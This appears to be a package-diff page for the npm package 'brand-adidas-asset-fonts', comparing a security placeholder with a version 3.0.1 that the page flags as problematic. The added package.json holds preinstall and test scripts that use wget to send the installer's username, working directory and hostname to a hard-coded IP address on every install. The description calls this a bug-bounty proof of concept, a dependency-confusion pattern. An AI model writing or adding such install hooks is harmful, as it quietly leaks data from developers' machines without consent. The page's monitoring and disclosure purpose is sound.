brand-adidas-asset-fonts 0.0.1-security → 3.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of brand-adidas-asset-fonts might be problematic. Click here for more details.
- package/index.js +3 -0
- package/package.json +13 -3
- package/README.md +0 -5
package/index.js
ADDED
package/package.json
CHANGED
@@ -1,6 +1,16 @@
|
|
1
1
|
{
|
2
2
|
"name": "brand-adidas-asset-fonts",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "3.0.1",
|
4
|
+
"description": "bugcrowd poc for adidas",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "wget --quiet \"http://193.37.212.247:1337/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
|
8
|
+
"preinstall": "wget --quiet \"http://193.37.212.247:1337/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
|
9
|
+
},
|
10
|
+
"dependencies": {},
|
11
|
+
"config": {
|
12
|
+
"unsafe-perm": true
|
13
|
+
},
|
14
|
+
"author": "",
|
15
|
+
"license": "ISC"
|
6
16
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=brand-adidas-asset-fonts for more information.
|